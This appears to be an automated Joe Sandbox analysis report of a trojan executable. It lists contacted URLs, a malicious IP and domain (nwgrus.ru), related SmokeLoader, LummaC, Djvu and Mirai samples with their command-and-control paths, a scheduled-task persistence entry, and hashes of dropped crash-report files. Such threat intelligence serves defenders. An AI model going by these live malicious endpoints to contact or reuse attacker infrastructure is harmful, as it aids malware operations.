https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.000000000482E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1777648899.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?V	explorer.exe, 0000000B.00000002.2961877649.0000000004AE8000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
109.175.29.39	nwgrus.ru	Bosnia and Herzegowina		9146	BIHNETBIHNETAutonomusSystemBA	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1533009
Start date and time:	2024-10-14 10:01:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	3sfCdeA1H2.exe renamed because original name is a hash value
Original Sample Name:	91be25f31b7891908a50dfdc9f03f2b4.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/9@4/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 38 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, mobsync.exe
Excluded IPs from analysis (whitelisted): 204.79.197.203, 184.28.90.27, 2.23.209.168, 2.23.209.179, 2.23.209.175, 2.23.209.167, 2.23.209.173, 2.23.209.171, 2.23.209.176, 2.23.209.178, 2.23.209.177, 2.23.209.150, 2.23.209.142, 2.23.209.149, 2.23.209.140, 2.23.209.143, 2.23.209.144, 2.23.209.153, 2.23.209.141, 2.23.209.135
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, r.bing.com.edgekey.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, p-static.bing.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, r.bing.com, prod.fs.microsoft.com.akadns.net, api-msn-com.a-0003.a-msedge.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:02:36	API Interceptor	4894x Sleep call for process: explorer.exe modified
09:02:36	Task Scheduler	Run new task: Firefox Default Browser Agent 9520CF1C77ACE06B path: C:\Users\user\AppData\Roaming\tttcvva

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.175.29.39	FyDBXJE74v.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	bCnarg2O62.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	Cjmw6m68OV.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	82HD7ZgYPA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	yosoborno.com/tmp/
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
	xvJv1BpknZ.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php
	file.exe	Get hash	malicious	Babuk, Djvu, PrivateLoader	Browse	cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	file.exe	Get hash	malicious	SmokeLoader	Browse	125.7.253.10
	1HGXcC63iu.exe	Get hash	malicious	SmokeLoader	Browse	189.161.95.103
	K80v6DHFHE.exe	Get hash	malicious	SmokeLoader	Browse	148.230.249.9
	FyDBXJE74v.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	file.exe	Get hash	malicious	SmokeLoader	Browse	63.143.98.185
	fTKQwp8fRa.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	LgigaSKsL6.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.147.128.172
	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	119.204.11.2
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BIHNETBIHNETAutonomusSystemBA	FyDBXJE74v.exe	Get hash	malicious	SmokeLoader	Browse	109.175.29.39
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	92.36.226.66
	na.elf	Get hash	malicious	Mirai	Browse	92.36.229.146
	bCnarg2O62.exe	Get hash	malicious	SmokeLoader	Browse	109.175.29.39
	UV2uLdRZix.exe	Get hash	malicious	SmokeLoader	Browse	185.12.79.25
	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse	109.175.29.39
	http://iss.fmpvs.gov.ba/Home/ChangeCulture?lang=hr&returnUrl=https://aaqkada0nzi2n2jhlthmzditndjinc1hz.hanskiin7.com/782340117681873687911955xbixgen-pgx-783419043035-ifxyeonkim-isxskyline-holt.comsf-1sf_rand()	Get hash	malicious	HTMLPhisher	Browse	109.175.10.156
	Cjmw6m68OV.exe	Get hash	malicious	SmokeLoader	Browse	109.175.29.39
	O9M84hUenb.elf	Get hash	malicious	Mirai, Okiru	Browse	92.36.229.158
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	92.36.226.66

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_fe8167436d6db6c6d2c4bed5d6f2d2c06e142845_f78a65ed_33b02981-0a51-457e-a865-9a43db5b7119\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.3033525586087413
Encrypted:	false
SSDEEP:	384:EyC1L+7yzjAWMo+hiRichk8zuiFRY4lO8k:Ey8+7yzj0o4QBhk8zuiFRY4lO8
MD5:	528C33206235BF0975BB80AE0AA1681E
SHA1:	C97FFC62E26E31CFF3B68369370203120B3F78C3
SHA-256:	839869FF49D5332955AC503D4A24C42530CC1D329AE7FB0E4918F5CD07573E95
SHA-512:	576AD5C28A0B8344223A4E8B8249F47927D1B3DED9D3665B37D777F1A670588FFEEA5D09D615D417280DEAD276E0529695D1854D8D6BCF01CA56A51FFE1E9C34
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.6.6.6.2.0.7.2.9.1.2.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.b.0.2.9.8.1.-.0.a.5.1.-.4.5.7.e.-.a.8.6.5.-.9.a.4.3.d.b.5.b.7.1.1.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.9.1.2.d.7.2.-.9.e.d.f.-.4.0.8.9.-.9.0.5.e.-.d.6.2.2.a.f.8.2.d.0.7.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.1.4.-.0.0.0.1.-.0.0.1.4.-.2.e.0.b.-.b.f.d.4.0.2.1.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9631.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 17 streams, CheckSum 0x00000004, Mon Oct 14 08:03:41 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	1037438
Entropy (8bit):	1.3824087536722143
Encrypted:	false
SSDEEP:	1536:U2wcgwElAsQU/h3iQCaYbwTrrtqrHSjZXhe0jsrr09AA0z:U2wcgpasQU5lYbwHIrHSNRyss
MD5:	2E5D06104DC17C0DC2DAED64D6EFC010
SHA1:	D39481A33C7D8A1B4AA850222466B1CCA563FC9B
SHA-256:	48E9C226198F00EEB3C95D18878B23D309978866E4A81F70EA5D4E380C44FBDE
SHA-512:	908C0B64A51A67DD0672E800085F95DFA20F3E90DBD087AA3CF1CB8DEB222B33D1D4E8B0E71DBA41BB49C4E475C264BC2A3DF4F1FA322018568A1DC53BCFB8C3
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......]..g................ ........m..............d...........h.......D...N...........x.......8...........T...$.......pX...\|..........,.......................................................................................................eJ.............Lw......................T..............g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A87.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	10850
Entropy (8bit):	3.6981518541042036
Encrypted:	false
SSDEEP:	192:R6l7wVeJdfUc6YX8TIgmfqzVoprq89bsytimPPFfPEm:R6lXJlUc6YsTIgmfqzVGsoimPPFf5
MD5:	433516E8E46D655F49161C493281F13E
SHA1:	1020BF0C3038A25534B2060776D03100E2F77E27
SHA-256:	EBE8BB0D63D4DA1635EEEF0B4251016CF39571F1D840F6A5ADD7539FF37C0C68
SHA-512:	385C005504DFF7DE74DFCE39FB9413C57B0A177DE63C93F5C3FFA1378267E7C587B3DB659D209A4B3C1906E8AD48DF76C4B87A534CB6E1ECDCF20E1418E77A61
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9AA8.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4724
Entropy (8bit):	4.462573756837234
Encrypted:	false
SSDEEP:	48:cvIwWl8zs5Jg771I9mRWpW8VYeYm8M4JYmFcxiyq85cZb9Q3jd:uIjfLI7ZA7VGJ04Dba3jd
MD5:	20276AD4AF30732E28E826EA939807C3
SHA1:	35F839B1C266DA90C8012D63184DDCF44983B5BC
SHA-256:	4C9F216C81A2170A8A1B6B784A238809CBB65ECAE10FE24A13A26B188BC0021A
SHA-512:	D0C183F55A1DEF9CFFABDE29EDECF689F4B8A7C350710717890A6A0C78CEB6E1C1861C5BBCF41EA08E6B265F00E40ABAA6D6469F9E61F97EF66EDAEE2730788D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542826" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002d.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	108216
Entropy (8bit):	4.005657858968619
Encrypted:	false
SSDEEP:	768:h7F9oInjxkCGxzOPajk0+ACWHpfnzbNyLYduJxP7pxoZsR1v9nvnFOOmdypfR3YU:fdkVzTrJvzgxhGiwGGnS5mFwiKui9l+a
MD5:	6D2F6F99D48B83155842E1CEC3F994C8
SHA1:	964230E8E72EA4C61AD95584B51A4BF7CC410FE6
SHA-256:	06F09810929E97A0ED27294670A0671A9CABD5E8E3B2BC10B938DA10D7804E08
SHA-512:	C564FFB74CE3D4A2BD8E16003D9538DF6C5DB59EE98737C51D33912A3DBDDE5A239727619D2CD88B720B39A2D1533845C571B3354BF6156926B55B88994296F5
Malicious:	false
Reputation:	low
Preview:	....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002e.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	108216
Entropy (8bit):	4.006497453778269
Encrypted:	false
SSDEEP:	768:JaF9oZnjxk5GCzOPajk0+ACWHpfnz3N9LYduJxP7pxoZsR1v9sa8FOOmdypfR3YV:DdkzzTrJvz0YhGiwGGnn6mFkiKSiDl+a
MD5:	C7924E891E0A9CF96CE20C115FD235D5
SHA1:	F17E697C1F605224D8AF18E82A79F90A56580998
SHA-256:	B2848EFB802A716D521EF52B431EE2942978E60E012399CF5A9E9AA1F13D37AB
SHA-512:	B0D0E01C63181909D044EE1A07FAC32066E45E396B6434F95852E885D4F2ABF8BDD247BFD895C1071B7F17E02D79482A10A973CA5060AA57460665F5F1030E60
Malicious:	false
Reputation:	low
Preview:	....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Windows[4].json

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	750
Entropy (8bit):	5.170609118186295
Encrypted:	false
SSDEEP:	12:YWgc2XCYAH+a+r8LsmwUaH+2yrZMAdrKC8K/y8kEhq1HLxycXNNZ/TCB893c3Z:Yzc2oH2rUaHt0drc6hE14
MD5:	1A171512171521F2562921DD1C63E2A3
SHA1:	EE912010557ACEF76F944EE54B3B8AB02803CBAB
SHA-256:	B1400CC813D647D477607836A4AA62D384914AF364530FFEF09F0A3ED512DFA7
SHA-512:	BC5A65A19203D7257F439D699F2562EB0AEA429C34D5A8613B762DC179AF0FEF499BADB1035C1AF75B04FF98FB092F988E18E904492F1538BC3D7E275B2C505B
Malicious:	false
Reputation:	low
